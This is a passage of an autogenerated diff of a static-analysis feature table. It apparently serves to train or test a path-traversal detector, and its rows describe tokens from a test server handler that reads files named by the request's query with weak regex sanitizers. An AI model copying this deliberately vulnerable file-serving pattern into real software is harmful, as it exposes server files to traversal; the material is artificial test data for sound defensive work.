/[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:165:46:165:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:7:166:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:16 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:14:166:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:18:166:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:18:166:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:18:166:22 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:18:166:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:18:166:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:24:166:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:24:166:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:24:166:26 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:24:166:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:24:166:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | calleeImports | url | @@ -5970,6 +63718,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:166:24:166:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:166:28:166:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:28:166:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:28:166:30 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:28:166:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:28:166:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | calleeImports | url | @@ -5979,6 +63732,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:166:33:166:36 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:166:39:166:43 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:39:166:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:39:166:43 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:39:166:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:39:166:43 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:166:45:166:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:45:166:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:166:45:166:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:166:45:166:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:166:45:166:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| 